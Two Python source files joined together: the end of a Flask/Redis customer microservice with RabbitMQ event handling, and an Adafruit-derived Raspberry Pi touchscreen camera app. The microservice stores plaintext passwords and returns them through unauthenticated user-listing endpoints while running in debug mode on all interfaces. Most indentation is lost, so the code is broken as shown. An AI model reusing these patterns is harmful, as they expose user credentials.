def get_credit():
user_name = request.json['UserName']
result = { "Status": "Error"}
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
app.logger.info('get-credit: %s', user_data)
result = { "Status": "Success", "Credit": user_data['Credit']}
return jsonify(result=result), 200
@app.route('/get-user/<user_name>', methods=['GET'])
def get_user(user_name):
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
result = { "Status": "Success", "User Info": user_data }
return jsonify(result=result), 200
@app.route('/get-all-users/', methods=['GET'])
def get_all_users():
if redis_db.keys().__len__() == 0:
result = { "Status": "No User Found"}
else:
user_data = []
for user_name in redis_db.keys():
user_data.append(json.loads(redis_db.get(user_name)))
result = { "Status": "Success", "Users": user_data }
return jsonify(result=result), 200
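# Illustrative client sketch (not part of the service): exercising the JSON API
# documented by index(). Host, port and field values are hypothetical.
def _example_client():
    base = "http://localhost:80"
    requests.post(base + "/add-user/", json={
        "UserName": "alice", "Password": "secret", "FullName": "Alice A.",
        "Email": "alice@example.com", "Credit": "100"})
    # add-user only publishes an event; the user exists in redis once the
    # event store round-trips it back to listener_callback below.
    response = requests.post(base + "/login-user/", json={
        "UserName": "alice", "Password": "secret"})
    print(response.json())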
def event_add_new_customer(user_data):
event_set_user_data(user_data)
print("event_add_new_customer - {0}".format(user_data))
def event_update_customer(user_data):
event_set_user_data(user_data)
print("event_update_customer - {0}".format(user_data))
def event_set_credit(user_data):
event_set_user_data(user_data)
print("event_set_credit - {0}".format(user_data))
def event_new_order_placed(message):
print(message)
message_json = json.loads(message)
data_json = json.loads(message_json['Data'])
user_data = json.loads(redis_db.get(data_json['CustomerId']))
app.logger.info('event_new_order_placed: %s', user_data)
result = { "OrderID": data_json['OrderID'], "Credit":user_data['Credit'] }
send_order_saga_data("CreditInfo", json.dumps(result))
def event_order_finalized(message):
print("event_order_finalized:" + message)
message_json = json.loads(message)
data_json = json.loads(message_json['Data'])
user_data = json.loads(redis_db.get(data_json['CustomerId']))
print("event_order_finalized: Customer:" + data_json['CustomerId'])
credit = user_data['Credit']
price = data_json['Price']
final_credit = 0 if float(credit) - float(price) < 0 else float(credit) - float(price)
user_data['Credit'] = final_credit
redis_db.set(data_json['CustomerId'], json.dumps(user_data))
redis_db.save()
def event_set_user_data(user_data):
local_data = {}
local_data['UserName'] = user_data['UserName']
local_data['FullName'] = user_data['FullName']
local_data['Password'] = user_data['Password']
local_data['Email'] = user_data['Email']
local_data['Credit'] = user_data['Credit']
redis_db.set(local_data['UserName'], json.dumps(local_data))
redis_db.save()
bus_user_name = os.environ["EVENT_BUS_USERNAME"]
bus_password = os.environ["EVENT_BUS_PASSWORD"]
bus_hostname = os.environ["EVENT_BUS_IP"]
credentials = pika.PlainCredentials(username=bus_user_name, password=bus_password)
parameters = pika.ConnectionParameters(bus_hostname, 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
#Event Bus Addressing
send_queue_name = "msdemo_queue_event_store"
send_exchange_name = "msdemo_exchange_event_store"
send_routing_key = "msdemo_routingkey_event_store"
receive_queue_name = "msdemo_queue_customer"
receive_exchange_name = "msdemo_exchange_customer"
receive_routing_key = "msdemo_routingkey_customer"
exchange_name_order = "msdemo_exchange_order"
saga_exchange_name_order = "msdemo_exchange_saga_order"
saga_routing_key_order = "msdemo_routingkey_saga_order"
saga_routing_key_orderresponse = "msdemo_routingkey_saga_orderresponse"
def listener_callback(ch, method, properties, body):
response_json = json.loads(body)
print("Listener Callback Key:{0} Json:{1}".format(method.routing_key, response_json))
if (method.routing_key == receive_routing_key):
if (response_json['Data']['Action'] == "Add New Customer"):
event_add_new_customer(response_json['Data'])
elif (response_json['Data']['Action'] == "Update Customer"):
event_update_customer(response_json['Data'])
elif (response_json['Data']['Action'] == "Set Credit"):
event_set_credit(response_json['Data'])
elif (method.routing_key == saga_routing_key_order):
print("Processing Order Placed. Event:{0}".format(response_json['Event']))
if (response_json['Event'] == "OrderPlaced"):
event_new_order_placed(response_json['Data'])
elif (response_json['Event'] == "OrderFinalized"):
event_order_finalized(response_json['Data'])
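# Illustrative message shapes handled above (inferred from the handlers; the
# field values are hypothetical). Customer events arrive with 'Data' already
# parsed into a dict:
#   {"Data": {"Action": "Add New Customer", "UserName": "alice", ...}}
# Saga events carry 'Data' as a JSON string whose own 'Data' field is itself a
# JSON string, hence the double json.loads() in event_new_order_placed and
# event_order_finalized:
#   {"Event": "OrderPlaced", "Data": '{"Data": "{\\"CustomerId\\": \\"alice\\", \\"OrderID\\": \\"42\\"}"}'}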
def init_event_bus():
threading.Thread(target=start_listener).start()
start_sender()
def start_listener():
#Receive from Event Store
receive_channel = connection.channel()
receive_channel.exchange_declare(exchange=receive_exchange_name, exchange_type='direct')
receive_channel.exchange_declare(exchange=saga_exchange_name_order, exchange_type='direct')
receive_channel.queue_declare(
queue=receive_queue_name,
durable=True,
exclusive=False,
auto_delete=False,
arguments=None)
receive_channel.queue_bind(exchange=receive_exchange_name,
queue=receive_queue_name,
routing_key=receive_routing_key)
receive_channel.queue_bind(exchange=saga_exchange_name_order,
queue=receive_queue_name,
routing_key=saga_routing_key_order)
receive_channel.basic_qos(prefetch_size=0, prefetch_count=1)
receive_channel.basic_consume(listener_callback, queue=receive_queue_name, no_ack=True)
receive_channel.start_consuming()
send_channel = connection.channel()
def start_sender():
#Send to Event Store
    send_channel.exchange_declare(exchange=send_exchange_name, exchange_type='direct')
send_channel.queue_declare(queue=send_queue_name, durable=True, exclusive=False, auto_delete=False, arguments=None)
send_channel.queue_bind(queue=send_queue_name, exchange=send_exchange_name, routing_key=send_routing_key)
def send_event_store_data(event_type, data):
item = {}
item_data = {}
item["Aggregate"] = "Customer"
item["Topic"] = "msdemo_topic.customer.{0}".format(event_type)
item["Timestamp"] = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S:%f")
item["Version"] = "1.0"
item["BUS_ExchangeName"] = receive_exchange_name
item["BUS_Queue"] = receive_queue_name
item["BUS_RoutingKey"] = receive_routing_key
item["Data"] = data
message = json.dumps(item)
print(message)
try:
send_channel.basic_publish(exchange=send_exchange_name,
routing_key=send_routing_key,
body=message,
properties=pika.BasicProperties(
delivery_mode = 2, # make message persistent
))
except pika.exceptions.ConnectionClosed:
print("send_event_store_data Exception. Connection closed")
    except Exception:
print("send_event_store_data Exception")
def send_order_saga_data(event_type, data):
print("send_order_saga_data type:{0} data:{1}".format(event_type, data))
item = {}
item_data = {}
item["Event"] = event_type
item["Data"] = data
message = json.dumps(item)
print(message)
try:
send_channel.basic_publish(exchange=exchange_name_order,
routing_key=saga_routing_key_orderresponse,
body=message,
properties=pika.BasicProperties(
delivery_mode = 2, # make message persistent
))
except pika.exceptions.ConnectionClosed:
print("send_order_saga_data Exception. Connection closed")
    except Exception:
print("send_order_saga_data Exception")
if __name__ == "__main__":
init_event_bus()
app.run(port=80, host="0.0.0.0", debug=True)
|
cam.py
|
#!/usr/bin/python
# Version: 2.1 (see ChangeLog.md for a list of changes)
# -------------------------------------------------------------------------------
# Header from original version:
# Point-and-shoot camera for Raspberry Pi w/camera and Adafruit PiTFT.
# This must run as root (sudo python cam.py) due to framebuffer, etc.
#
# Adafruit invests time and resources providing this open source code,
# please support Adafruit and open-source development by purchasing
# products from Adafruit, thanks!
#
# http://www.adafruit.com/products/998 (Raspberry Pi Model B)
# http://www.adafruit.com/products/1367 (Raspberry Pi Camera Board)
# http://www.adafruit.com/products/1601 (PiTFT Mini Kit)
# This can also work with the Model A board and/or the Pi NoIR camera.
#
# Prerequisite tutorials: aside from the basic Raspbian setup and
# enabling the camera in raspi-config, you should configure WiFi (if
# using wireless with the Dropbox upload feature) and read these:
# PiTFT setup (the tactile switch buttons are not required for this
# project, but can be installed if you want them for other things):
# http://learn.adafruit.com/adafruit-pitft-28-inch-resistive-touchscreen-display-raspberry-pi
# Dropbox setup (if using the Dropbox upload feature):
# http://raspi.tv/2013/how-to-use-dropbox-with-raspberry-pi
#
# Written by Phil Burgess / Paint Your Dragon for Adafruit Industries.
# BSD license, all text above must be included in any redistribution.
# -------------------------------------------------------------------------------
# -------------------------------------------------------------------------------
# Changes from the original version by Bernhard Bablok (mail a_t bablokb dot de)
# Tested with picamera 1.8.
# -------------------------------------------------------------------------------
import atexit
import cPickle as pickle
import errno
import fnmatch
import io
import sys
import os
import os.path
import pwd
import picamera
import pyexiv2
import pygame
import stat
import threading
import time
from pygame.locals import *
from subprocess import call
# Class encapsulating constants --------------------------------------------
class Mode:
UNDEFINED = -1
PLAYBACK = 0
DELETE = 1
NO_IMAGES = 2
VIEWFINDER = 3
STORAGE = 4
SIZE = 5
EFFECT = 6
ISO = 7
AWB = 8
QUALITY = 9
QUIT = 10
LAST = QUIT # LAST must be equal to the highest mode
# UI classes ---------------------------------------------------------------
# Small resistive touchscreen is best suited to simple tap interactions.
# Importing a big widget library seemed a bit overkill. Instead, a couple
# of rudimentary classes are sufficient for the UI elements:
# Icon is a very simple bitmap class, just associates a name and a pygame
# image (PNG loaded from icons directory) for each.
# There isn't a globally-declared fixed list of Icons. Instead, the list
# is populated at runtime from the contents of the 'icons' directory.
class Icon:
def __init__(self, name):
self.name = name
try:
self.bitmap = pygame.image.load(iconPath + '/' + name + '.png')
except:
pass
# Button is a simple tappable screen region. Each has:
# - bounding rect ((X,Y,W,H) in pixels)
# - optional background color and/or Icon (or None), always centered
# - optional foreground Icon, always centered
# - optional single callback function
# - optional single value passed to callback
# Occasionally Buttons are used as a convenience for positioning Icons
# but the taps are ignored. Stacking order is important; when Buttons
# overlap, lowest/first Button in list takes precedence when processing
# input, and highest/last Button is drawn atop prior Button(s). This is
# used, for example, to center an Icon by creating a passive Button the
# width of the full screen, but with other buttons left or right that
# may take input precedence (e.g. the Effect labels & buttons).
# After Icons are loaded at runtime, a pass is made through the global
# buttons[] list to assign the Icon objects (from names) to each Button.
class Button:
def __init__(self, rect, **kwargs):
self.rect = rect # Bounds
self.color = None # Background fill color, if any
self.iconBg = None # Background Icon (atop color fill)
self.iconFg = None # Foreground Icon (atop background)
self.bg = None # Background Icon name
self.fg = None # Foreground Icon name
self.callback = None # Callback function
self.value = None # Value passed to callback
for key, value in kwargs.iteritems():
if key == 'color': self.color = value
elif key == 'bg' : self.bg = value
elif key == 'fg' : self.fg = value
elif key == 'cb' : self.callback = value
elif key == 'value': self.value = value
def selected(self, pos):
x1 = self.rect[0]
y1 = self.rect[1]
x2 = x1 + self.rect[2] - 1
y2 = y1 + self.rect[3] - 1
if ((pos[0] >= x1) and (pos[0] <= x2) and
(pos[1] >= y1) and (pos[1] <= y2)):
if self.callback:
if self.value is None: self.callback()
else: self.callback(self.value)
return True
return False
def draw(self, screen):
if self.color:
screen.fill(self.color, self.rect)
if self.iconBg:
screen.blit(self.iconBg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconBg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconBg.bitmap.get_height())/2))
if self.iconFg:
screen.blit(self.iconFg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconFg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconFg.bitmap.get_height())/2))
def setBg(self, name):
if name is None:
self.iconBg = None
else:
for i in icons:
if name == i.name:
self.iconBg = i
break
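# Illustrative sketch (hypothetical icon names): a passive full-width Button
# that just centers an icon, and a tappable Button wired to a callback:
#   Button((0, 0, 320, 240), bg='some-background')
#   Button((0, 188, 320, 52), bg='done', cb=doneCallback)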
# UI callbacks -------------------------------------------------------------
# These are defined before globals because they're referenced by items in
# the global buttons[] list.
def isoCallback(n): # Pass 1 (next ISO) or -1 (prev ISO)
global isoMode
setIsoMode((isoMode + n) % len(isoData))
def awbCallback(n): # Pass 1 (next AWB) or -1 (prev AWB)
global awbMode
setAwbMode((awbMode + n) % len(awbData))
def settingCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
screenMode += n
if screenMode <= Mode.VIEWFINDER: screenMode = len(buttons) - 1
elif screenMode >= len(buttons): screenMode = Mode.VIEWFINDER + 1
def fxCallback(n): # Pass 1 (next effect) or -1 (prev effect)
global fxMode
setFxMode((fxMode + n) % len(fxData))
def quitCallback(): # Quit confirmation button
saveSettings()
raise SystemExit
def viewCallback(n): # Viewfinder buttons
global imgNums, loadIdx, imgSurface, screenMode, screenModePrior, settingMode, storeMode
    if n == 0: # Gear icon (settings)
screenMode = settingMode # Switch to last settings mode
    elif n == 1: # Play icon (image playback)
if imgSurface: # Last photo is already memory-resident
loadIdx = len(imgNums)-1
screenMode = Mode.PLAYBACK
screenModePrior = Mode.UNDEFINED
else: # Load image
if len(imgNums):
loadIdx = len(imgNums)-1
showImage(loadIdx)
else: screenMode = Mode.NO_IMAGES
else: # Rest of screen = shutter
takePicture()
def doneCallback(): # Exit settings
global screenMode, settingMode
if screenMode > Mode.VIEWFINDER:
settingMode = screenMode
saveSettings()
screenMode = Mode.VIEWFINDER
def imageCallback(n): # Pass 1 (next image), -1 (prev image) or 0 (delete)
global screenMode
    if n == 0:
screenMode = Mode.DELETE
else:
showNextImage(n)
def deleteCallback(n): # Delete confirmation
    global loadIdx, imgNums, imgSurface, screenMode, screenModePrior, storeMode
screenMode = Mode.PLAYBACK
screenModePrior = Mode.UNDEFINED
    if n:
os.remove(pathData[storeMode] +
'/rpi_' + '%04d' % imgNums[loadIdx] + '.jpg')
os.remove(cacheDir + '/rpi_' + '%04d' % imgNums[loadIdx] + '.jpg')
del imgNums[loadIdx]
if len(imgNums):
screen.fill(0)
pygame.display.update()
showNextImage(-1 if loadIdx==len(imgNums) else 0)
        else: # Last image deleted; go to 'no images' mode
screenMode = Mode.NO_IMAGES
imgSurface = None
loadIdx = -1
def storeModeCallback(n): # Radio buttons on storage settings screen
global pathData, storeMode
buttons[Mode.STORAGE][storeMode + 3].setBg('radio3-0')
storeMode = n
buttons[Mode.STORAGE][storeMode + 3].setBg('radio3-1')
#create directory if it does not exist
if not os.path.isdir(pathData[storeMode]):
try:
os.makedirs(pathData[storeMode])
# Set new directory ownership to pi user, mode to 755
os.chown(pathData[storeMode], uid, gid)
os.chmod(pathData[storeMode],
stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
except OSError as e:
# errno = 2 if can't create folder
print errno.errorcode[e.errno]
raise SystemExit
# read all existing image numbers
readImgNumsList(storeMode)
def sizeModeCallback(n): # Radio buttons on size settings screen
global sizeMode
buttons[Mode.SIZE][sizeMode + 3].setBg('radio3-0')
sizeMode = n
buttons[Mode.SIZE][sizeMode + 3].setBg('radio3-1')
camera.resolution = sizeData[sizeMode][1]
def qualityModeCallback(n): # Radio buttons on quality settings screen
global qualityMode
buttons[Mode.QUALITY][3+qualityMode].setBg('radio3-0')
qualityMode = n
buttons[Mode.QUALITY][3+qualityMode].setBg('radio3-1')
# Global stuff -------------------------------------------------------------
screenMode = Mode.VIEWFINDER # Current screen mode; default = viewfinder
screenModePrior = Mode.UNDEFINED # Prior screen mode (for detecting changes)
settingMode = Mode.QUIT # Last-used settings mode (default = quit)
storeMode = 0 # Storage mode; default = Photos folder
storeModePrior = -1 # Prior storage mode (for detecting changes)
sizeMode = 0 # Image size; default = Large
fxMode = 0 # Image effect; default = Normal
isoMode = 0 # ISO setting; default = Auto
awbMode = 0 # AWB setting; default = auto
qualityMode = 0 # Quality setting: default = jpg
iconPath = 'icons' # Subdir containing UI bitmaps (PNG format)
loadIdx = -1 # Image index for loading
imgSurface = None # pygame Surface w/last-loaded image
# list of existing image numbers. Read by storeModeCallback using
# readImgNumsList
imgNums = []
# To use Dropbox uploader, must have previously run the dropbox_uploader.sh
# script to set up the app key and such. If this was done as the normal pi
# user, set upconfig to the .dropbox_uploader config file in that account's
# home directory. Alternately, could run the setup script as root and
# delete the upconfig line below.
uploader = '/home/pi/Dropbox-Uploader/dropbox_uploader.sh'
upconfig = '/home/pi/.dropbox_uploader'
sizeData = [ # Camera parameters for different size settings
# Full res Viewfinder
[(2592, 1944), (320, 240)], # Large
[(1920, 1080), (320, 180)], # Med
[(1440, 1080), (320, 240)]] # Small
isoData = [ # Values for ISO settings [ISO value, indicator X position]
[ 0, 27], [100, 64], [200, 97], [320, 137],
[400, 164], [500, 197], [640, 244], [800, 297]]
# Settings for auto white balance. A fixed list is used because
# we have pre-generated icons.
awbData = [ 'auto', 'off', 'sunlight',
'cloudy', 'shade', 'tungsten', 'fluorescent', 'incandescent',
'flash', 'horizon' ]
# A fixed list of image effects is used (rather than polling
# camera.IMAGE_EFFECTS) because the latter contains a few elements
# that aren't valid (at least in video_port mode) -- e.g. blackboard,
# whiteboard, posterize (but posterise, British spelling, is OK).
# Others have no visible effect (or might require setting add'l
# camera parameters for which there's no GUI yet) -- e.g. saturation,
# colorbalance, colorpoint.
fxData = [
'none', 'sketch', 'gpen', 'pastel', 'watercolor', 'oilpaint', 'hatch',
'negative', 'colorswap', 'posterise', 'denoise', 'blur', 'film',
'washedout', 'emboss', 'cartoon', 'solarize' ]
# cache directory for thumbnails
cacheDir = '/home/pi/.cache/picam'
pathData = [
'/home/pi/Photos', # Path for storeMode = 0 (Photos folder)
'/boot/DCIM/CANON999', # Path for storeMode = 1 (Boot partition)
'/home/pi/Photos'] # Path for storeMode = 2 (Dropbox)
icons = [] # This list gets populated at startup
# buttons[] is a list of lists; each top-level list element corresponds
# to one screen mode (e.g. viewfinder, image playback, storage settings),
# and each element within those lists corresponds to one UI button.
# There's a little bit of repetition (e.g. prev/next buttons are
# declared for each settings screen, rather than a single reusable
# set); trying to reuse those few elements just made for an ugly
# tangle of code elsewhere.
buttons = [0] * (Mode.LAST+1) # create dummy elements for every screen
buttons[Mode.PLAYBACK] = [
Button(( 0,188,320, 52), bg='done' , cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev' , cb=imageCallback, value=-1),
Button((240, 0, 80, 52), bg='next' , cb=imageCallback, value= 1),
Button(( 88, 70,157,102)), # 'Working' label (when enabled)
Button((148,129, 22, 22)), # Spinner (when enabled)
Button((121, 0, 78, 52), bg='trash', cb=imageCallback, value= 0)]
buttons[Mode.DELETE] = [
Button(( 0,35,320, 33), bg='delete'),
Button(( 32,86,120,100), bg='yn', fg='yes',cb=deleteCallback, value=True),
Button((168,86,120,100), bg='yn', fg='no',cb=deleteCallback, value=False)]
buttons[Mode.NO_IMAGES] = [
Button((0, 0,320,240), cb=doneCallback), # Full screen = button
Button((0,188,320, 52), bg='done'), # Fake 'Done' button
Button((0, 53,320, 80), bg='empty')] # 'Empty' message
buttons[Mode.VIEWFINDER] = [
Button(( 0,188,156, 52), bg='gear', cb=viewCallback, value=0),
Button((164,188,156, 52), bg='play', cb=viewCallback, value=1),
Button(( 0, 0,320,240) , cb=viewCallback, value=2),
Button(( 88, 51,157,102)), # 'Working' label (when enabled)
Button((148, 110,22, 22))] # Spinner (when enabled)
buttons[Mode.STORAGE] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 2, 60,100,120), bg='radio3-1', fg='store-folder',
cb=storeModeCallback, value=0),
Button((110, 60,100,120), bg='radio3-0', fg='store-boot',
cb=storeModeCallback, value=1),
Button((218, 60,100,120), bg='radio3-0', fg='store-dropbox',
cb=storeModeCallback, value=2),
Button(( 0, 10,320, 35), bg='storage')]
buttons[Mode.SIZE] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 2, 60,100,120), bg='radio3-1', fg='size-l',
cb=sizeModeCallback, value=0),
Button((110, 60,100,120), bg='radio3-0', fg='size-m',
cb=sizeModeCallback, value=1),
Button((218, 60,100,120), bg='radio3-0', fg='size-s',
cb=sizeModeCallback, value=2),
Button(( 0, 10,320, 29), bg='size')]
buttons[Mode.EFFECT] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 0, 70, 80, 52), bg='prev', cb=fxCallback , value=-1),
Button((240, 70, 80, 52), bg='next', cb=fxCallback , value= 1),
Button(( 0, 67,320, 91), bg='fx-none'),
Button(( 0, 11,320, 29), bg='fx')]
buttons[Mode.ISO] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 0, 70, 80, 52), bg='prev', cb=isoCallback , value=-1),
Button((240, 70, 80, 52), bg='next', cb=isoCallback , value= 1),
Button(( 0, 79,320, 33), bg='iso-0'),
Button(( 9,134,302, 26), bg='iso-bar'),
Button(( 17,157, 21, 19), bg='iso-arrow'),
Button(( 0, 10,320, 29), bg='iso')]
buttons[Mode.AWB] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 0, 70, 80, 52), bg='prev', cb=awbCallback , value=-1),
Button((240, 70, 80, 52), bg='next', cb=awbCallback , value= 1),
Button(( 0, 67,320, 91), bg='awb-auto'),
Button(( 0, 11,320, 29), bg='awb')]
buttons[Mode.QUALITY] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 32, 60,100,120), bg='radio3-1', fg='quality-jpg',
cb=qualityModeCallback, value=0),
Button((188, 60,100,120), bg='radio3-0', fg='quality-jpg+raw',
cb=qualityModeCallback, value=1),
Button(( 0, 10,320, 35), bg='quality')]
buttons[Mode.QUIT] = [
Button(( 0,188,320, 52), bg='done' , cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev' , cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next' , cb=settingCallback, value= 1),
Button((110, 60,100,120), bg='quit-ok', cb=quitCallback),
Button(( 0, 10,320, 35), bg='quit')]
# Assorted utility functions -----------------------------------------------
def setFxMode(n):
global fxMode
fxMode = n
camera.image_effect = fxData[fxMode]
buttons[Mode.EFFECT][5].setBg('fx-' + fxData[fxMode])
def setIsoMode(n):
global isoMode
isoMode = n
camera.ISO = isoData[isoMode][0]
buttons[Mode.ISO][5].setBg('iso-' + str(isoData[isoMode][0]))
buttons[Mode.ISO][7].rect = ((isoData[isoMode][1] - 10,) +
buttons[Mode.ISO][7].rect[1:])
def setAwbMode(n):
global awbMode
awbMode = n
buttons[Mode.AWB][5].setBg('awb-' + awbData[awbMode])
camera.awb_mode = awbData[awbMode]
if awbData[awbMode] == 'off':
camera.awb_gains = (1.0,1.0) # needed because of ignorant engineers
# record white-balance in exif. Too bad exif-tags only allow auto/manual.
if awbData[awbMode] == 'auto':
camera.exif_tags['EXIF.WhiteBalance'] = '0'
else:
camera.exif_tags['EXIF.WhiteBalance'] = '1'
def saveSettings():
try:
outfile = open(os.path.expanduser('~')+'/cam.pkl', 'wb')
# Use a dictionary (rather than pickling 'raw' values) so
# the number & order of things can change without breaking.
d = { 'fx' : fxMode,
'iso' : isoMode,
'awb' : awbMode,
'quality' : qualityMode,
'size' : sizeMode,
'store' : storeMode }
pickle.dump(d, outfile)
outfile.close()
except:
pass
def loadSettings():
try:
infile = open(os.path.expanduser('~')+'/cam.pkl', 'rb')
d = pickle.load(infile)
infile.close()
if 'fx' in d: setFxMode( d['fx'])
if 'iso' in d: setIsoMode( d['iso'])
if 'awb' in d: setAwbMode( d['awb'])
if 'quality' in d: qualityModeCallback(d['quality'])
if 'size' in d: sizeModeCallback( d['size'])
if 'store' in d: storeModeCallback(d['store'])
except:
storeModeCallback(storeMode)
# Read existing image numbers into imgNums. Triggered by a change of
# storeMode.
def readImgNumsList(n):
global pathData, imgNums
imgNums = []
for file in os.listdir(pathData[n]):
if fnmatch.fnmatch(file,'rpi_[0-9][0-9][0-9][0-9].jpg'):
imgNums.append(int(file[4:8]))
imgNums.sort()
# Busy indicator. To use, run in separate thread, set global 'busy'
# to False when done.
def spinner():
global busy, screenMode, screenModePrior
buttons[screenMode][3].setBg('working')
buttons[screenMode][3].draw(screen)
pygame.display.update()
busy = True
n = 0
while busy is True:
buttons[screenMode][4].setBg('work-' + str(n))
buttons[screenMode][4].draw(screen)
pygame.display.update()
n = (n + 1) % 5
time.sleep(0.15)
buttons[screenMode][3].setBg(None)
buttons[screenMode][4].setBg(None)
screenModePrior = Mode.UNDEFINED # Force refresh
def saveThumbnail(fname,tname): # fname: filename with extension
metadata = pyexiv2.ImageMetadata(fname)
metadata.read()
thumb = metadata.exif_thumbnail
thumb.write_to_file(tname) # tname: thumbname without extension
os.chown(tname+".jpg", uid, gid)
os.chmod(tname+".jpg",
stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
def takePicture():
global busy, gid, loadIdx, imgSurface, sizeMode, storeMode, storeModePrior, uid, cacheDir, imgNums
    saveNum = (imgNums[-1] + 1) % 10000 if len(imgNums) else 0
filename = pathData[storeMode] + '/rpi_' + '%04d' % saveNum + '.jpg'
cachename = cacheDir+'/rpi_' + '%04d' % saveNum
t = threading.Thread(target=spinner)
t.start()
imgSurface = None
camera.resolution = sizeData[sizeMode][0]
try:
camera.capture(filename, use_video_port=False, format='jpeg',
thumbnail=(340,240,60),bayer=qualityMode==1)
imgNums.append(saveNum)
# Set image file ownership to pi user, mode to 644
os.chown(filename, uid, gid)
os.chmod(filename,
stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
saveThumbnail(filename,cachename)
imgSurface = pygame.image.load(cachename+'.jpg')
if storeMode == 2: # Dropbox
if upconfig:
cmd = uploader + ' -f ' + upconfig + ' upload ' + filename + ' Photos/' + os.path.basename(filename)
else:
cmd = uploader + ' upload ' + filename + ' Photos/' + os.path.basename(filename)
call ([cmd], shell=True)
finally:
# Add error handling/indicator (disk full, etc.)
camera.resolution = sizeData[sizeMode][1]
busy = False
t.join()
if imgSurface:
if imgSurface.get_height() < 240: # Letterbox
screen.fill(0)
screen.blit(imgSurface,
((320 - imgSurface.get_width() ) / 2,
(240 - imgSurface.get_height()) / 2))
pygame.display.update()
time.sleep(2.5)
loadIdx = len(imgNums)-1
def showNextImage(direction):
global busy, loadIdx, imgNums
loadIdx += direction
if loadIdx == len(imgNums): # past end of list, continue at beginning
loadIdx = 0
elif loadIdx == -1: # before start of list, continue with end of list
loadIdx = len(imgNums)-1
showImage(loadIdx)
def showImage(n):
global busy, imgNums, imgSurface, screenMode, screenModePrior, storeMode, pathData
t = threading.Thread(target=spinner)
t.start()
cachefile = cacheDir + '/rpi_' + '%04d' % imgNums[n] + '.jpg'
# if cachefile does not exist, recreate it
if not os.path.exists(cachefile):
filename = pathData[storeMode] + '/rpi_' + '%04d' % imgNums[n] + '.jpg'
saveThumbnail(filename,cacheDir + '/rpi_' + '%04d' % imgNums[n])
imgSurface = pygame.image.load(cachefile)
busy = False
t.join()
screenMode = Mode.PLAYBACK
screenModePrior = Mode.UNDEFINED # Force screen refresh
# Initialization -----------------------------------------------------------
# fix iconPath: it's relative to the executable
thisDir,thisFile = os.path.split(sys.argv[0])
iconPath = thisDir + os.path.sep + iconPath
# Init framebuffer/touchscreen environment variables
os.putenv('SDL_VIDEODRIVER', 'fbcon')
os.putenv('SDL_FBDEV' , '/dev/fb1')
os.putenv('SDL_MOUSEDRV' , 'TSLIB')
os.putenv('SDL_MOUSEDEV' , '/dev/input/touchscreen')
# running as root from /etc/rc.local and not under sudo control, so
# query ids directly
uid = pwd.getpwnam("pi").pw_uid
gid = pwd.getpwnam("pi").pw_gid
# Buffers for viewfinder data
rgb = bytearray(320 * 240 * 3)
# Init pygame and screen
pygame.init()
pygame.mouse.set_visible(False)
screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN)
# Init camera and set up default values
camera = picamera.PiCamera()
atexit.register(camera.close)
camera.resolution = sizeData[sizeMode][1]
# Load all icons at startup.
for file in os.listdir(iconPath):
if fnmatch.fnmatch(file, '*.png'):
icons.append(Icon(file.split('.')[0]))
# Assign Icons to Buttons, now that they're loaded
for s in buttons: # For each screenful of buttons...
for b in s: # For each button on screen...
for i in icons: # For each icon...
if b.bg == i.name: # Compare names; match?
b.iconBg = i # Assign Icon to Button
b.bg = None # Name no longer used; allow garbage collection
if b.fg == i.name:
b.iconFg = i
b.fg = None
# one-time initialization of cache-directory
if not os.path.isdir(cacheDir):
try:
os.makedirs(cacheDir)
# Set new directory ownership to pi user, mode to 755
os.chown(cacheDir, uid, gid)
os.chmod(cacheDir,
stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
except OSError as e:
# errno = 2 if can't create folder
print errno.errorcode[e.errno]
raise SystemExit
loadSettings() # Must come last; fiddles with Button/Icon states
# Main loop ----------------------------------------------------------------
while(True):
# Process touchscreen input
while True:
for event in pygame.event.get():
            if event.type == MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
for b in buttons[screenMode]:
if b.selected(pos): break
# If in viewfinder or settings modes, stop processing touchscreen
# and refresh the display to show the live preview. In other modes
# (image playback, etc.), stop and refresh the screen only when
# screenMode changes.
if screenMode >= Mode.VIEWFINDER or screenMode != screenModePrior: break
# Refresh display
